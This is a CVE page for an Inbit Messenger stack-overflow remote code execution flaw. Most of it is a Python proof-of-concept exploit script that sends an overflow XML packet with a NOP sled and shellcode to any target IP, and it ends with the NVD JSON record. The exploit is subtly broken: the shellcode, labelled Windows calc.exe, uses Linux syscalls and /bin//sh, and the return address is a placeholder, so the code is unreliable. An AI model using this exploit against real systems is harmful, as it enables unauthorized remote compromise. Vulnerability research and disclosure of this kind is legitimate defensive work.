CVE-2023-54329

#!/usr/bin/env python3 # CVE-2023-54329 PoC - Inbit Messenger RCE # This PoC demonstrates the stack overflow vulnerability in Inbit Messenger # Target: Inbit Messenger 4.6.0 - 4.9.0 on port 10883 import socket import sys def create_exploit_payload(): """ Generate malicious XML payload to trigger stack overflow """ # Padding to overflow the buffer and reach return address padding = b'A' * 1000 # NOP sled for shellcode landing nop_sled = b'\x90' * 50 # Shellcode for Windows - spawn calc.exe (placeholder for actual command) # Using simple calc.exe shellcode for demonstration shellcode = ( b'\x31\xc0\x50\x68\x63\x61\x6c\x63\x54\x5b\x50\x53\x89\xe1\xb0\x66\xcd\x80\x31\xd2\x52\x66\x68\x11\x5c\x43\x66\x53\x89\xe1\x6a\x10\x51\x50\x89\xe1\xb0\x66\xcd\x80\x31\xc9\x51\x50\x89\xe1\xb0\x66\xcd\x80\x31\xc0\x50\x50\x51\x40\x50\x89\xe1\xb0\x66\xcd\x80\x50\x50\x40\x50\x89\xe1\xb0\x66\xcd\x80\x93\x31\xc0\x51\x50\x89\xe1\xb0\x0e\xcd\x80\x31\xc0\x50\x68\x2e\x65\x78\x65\x68\x63\x61\x6c\x63\x54\xb0\x2b\xcd\x80\x93\x6a\x01\x5b\x31\xc0\x50\x89\xe1\xb0\x66\xcd\x80\x89\xcf\x31\xc0\xb0\x3f\xcd\x80\x41\x80\xf9\x03\x75\xf5\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x54\x5b\x50\x53\x89\xe1\xb0\x0b\xcd\x80' ) # Overwrite EIP with address to NOP sled (address needs to be adjusted) eip = b'\x42\x42\x42\x42' # Placeholder - needs to point to NOP sled payload = padding + eip + nop_sled + shellcode # Construct XML packet xml_packet = f'''<?xml version="1.0" encoding="UTF-8"?> <message> <header> <type>DATA</type> <length>{len(payload)}</length> </header> <body> <data>{payload.decode('latin-1')}</data> </body> </message>''' return xml_packet.encode('utf-8') def exploit(target_ip, target_port=10883): """ Send exploit payload to target """ print(f'[*] Target: {target_ip}:{target_port}') print('[*] Generating exploit payload...') payload = create_exploit_payload() print(f'[*] Payload size: {len(payload)} bytes') try: print('[*] Connecting to target...') sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(10) sock.connect((target_ip, target_port)) print('[*] Sending exploit payload...') sock.send(payload) print('[+] Payload sent successfully!') # Wait for response try: response = sock.recv(4096) print(f'[*] Received response: {response[:100]}') except: pass sock.close() print('[*] Exploitation completed') except Exception as e: print(f'[-] Error: {str(e)}') return False return True if __name__ == '__main__': if len(sys.argv) < 2: print(f'Usage: {sys.argv[0]} <target_ip> [port]') sys.exit(1) target = sys.argv[1] port = int(sys.argv[2]) if len(sys.argv) > 2 else 10883 exploit(target, port)

{"cve": {"id": "CVE-2023-54329", "sourceIdentifier": "[email protected]", "published": "2026-01-13T23:15:59.970", "lastModified": "2026-01-30T15:47:32.033", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Inbit Messenger 4.6.0 - 4.9.0 contains a remote command execution vulnerability that allows unauthenticated attackers to execute arbitrary commands by exploiting a stack overflow in the messenger's protocol. Attackers can send specially crafted XML packets to port 10883 with a malicious payload to trigger the vulnerability and execute commands with system privileges."}, {"lang": "es", "value": "Inbit Messenger 4.6.0 - 4.9.0 contiene una vulnerabilidad de ejecución remota de comandos que permite a atacantes no autenticados ejecutar comandos arbitrarios explotando un desbordamiento de pila en el protocolo del mensajero. Los atacantes pueden enviar paquetes XML especialmente diseñados al puerto 10883 con una carga útil maliciosa para activar la vulnerabilidad y ejecutar comandos con privilegios de sistema."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-121"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-787"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:inbit:inbit_messenger:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.6.0", "versionEndIncluding": "4.9.0", "matchCriteriaId": "A055F099-1772-4ECD-BD63-2067401A7891"}]}]}], "references": [{"url": "https://github.com/a-rey/exploits/blob/main/writeups/Inbit_Messenger/v4.6.0/writeup.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://web.archive.org/web/20200122082432/https://www.softsea.com/review/Inbit-Messenger-Basic-Edition.html", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.exploit-db.com/exploits/51127", "source": "[email protected]", "tags": ["Exploit"]}, {"url": "https://www.vulncheck.com/advisories/inbit-messenger-unauthenticated-remote-command-execution-rce", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://github.com/a-rey/exploits/blob/main/writeups/Inbit_Messenger/v4.6.0/writeup.md", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory"]}]}}